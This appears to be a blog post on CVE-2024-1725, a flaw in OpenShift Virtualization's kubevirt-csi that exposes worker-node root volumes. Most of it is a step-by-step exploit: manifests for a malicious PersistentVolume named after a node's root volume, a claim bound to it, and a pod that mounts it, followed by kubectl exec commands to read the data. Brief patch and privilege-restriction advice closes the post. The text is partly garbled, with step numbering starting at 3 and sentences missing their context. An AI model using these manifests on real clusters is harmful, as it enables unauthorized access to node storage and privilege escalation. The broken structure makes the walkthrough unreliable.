CVE-2024-1725 - Exploiting kubevirt-csi in OpenShift Virtualization HCP for Root Volume Access

A recently discovered security vulnerability, CVE-2024-1725, was identified in the kubevirt-csi component used in OpenShift Virtualization's Hosted Control Plane (HCP). This flaw could let authenticated attackers gain access to sensitive storage volumes, particularly the root volume of worker nodes, simply by tricking the system with a specially named Persistent Volume (PV).

This post explains the vulnerability in simple terms, dives into the exploitation process with example code, and provides essential references.

Product: OpenShift Virtualization (primarily in Hosted Control Plane architectures)

- Scope: Anyone who can create custom Persistent Volumes and Persistent Volume Claims (PVCs) in a project/namespace.

How the Flaw Works

The bug comes from how kubevirt-csi binds volumes. When you create a Persistent Volume (PV) with a name matching the name of a node's root volume, the system may allow you to read or mount that volume—even if you aren't supposed to!

They spot a worker node named, e.g., hcp-worker-1.

3. They create a PV named hcp-worker-1 (or whatever naming the backend expects for node root volumes).

Step 1: Get Worker Node Volume Names

First, list all nodes and inspect their corresponding root volume names.

kubectl get nodes

Below is an example manifest for a malicious PV

apiVersion: v1
kind: PersistentVolume
metadata:
  name: hcp-worker-1
spec:
  capacity:
    storage: 100Gi
  volumeMode: Filesystem
  accessModes:
    - ReadWriteOnce
  persistentVolumeReclaimPolicy: Retain
  csi:
    driver: kubevirt-csi-driver
    volumeHandle: hcp-worker-1   # Important: matches the node root volume name

Now, the attacker requests a claim for that volume

apiVersion: v1
kind: PersistentVolumeClaim
metadata:
  name: attacker-root-access
spec:
  accessModes:
    - ReadWriteOnce
  resources:
    requests:
      storage: 10Gi
  volumeName: hcp-worker-1

A pod mounts the PVC

apiVersion: v1
kind: Pod
metadata:
  name: pv-exploit-pod
spec:
  containers:
    - name: busybox
      image: busybox
      command: [ "sh", "-c", "sleep 360" ]
      volumeMounts:
        - mountPath: "/mnt"
          name: attacker-root-access
  volumes:
    - name: attacker-root-access
      persistentVolumeClaim:
        claimName: attacker-root-access

Inside the pod

kubectl exec -it pv-exploit-pod -- /bin/sh
# Now you have access to the (previously protected) node root volume data.
ls /mnt

Who Is Vulnerable?

- OpenShift Virtualization HCP clusters with default permissions and unpatched kubevirt-csi deployments.

Note: This attack requires the ability to create PVs and PVCs, which might be limited; however, in many multi-tenant clusters, project admins can create such objects.

Patch immediately: Upgrade to patched versions as soon as they are available.

- Limit PV creation privileges: Restrict PV/PVC creation to trusted users.

References

- Red Hat Security Advisory for CVE-2024-1725
- OpenShift Virtualization documentation
- KubeVirt CSI documentation

Conclusion

CVE-2024-1725 exposes a critical hole in the Hosted Control Plane architecture of OpenShift Virtualization. While this issue requires authenticated access, its impact is severe and could allow attackers to escalate privileges and compromise cluster integrity.

Timeline

Published on: 03/07/2024 20:15:50 UTC
Last modified on: 04/26/2024 20:15:07 UTC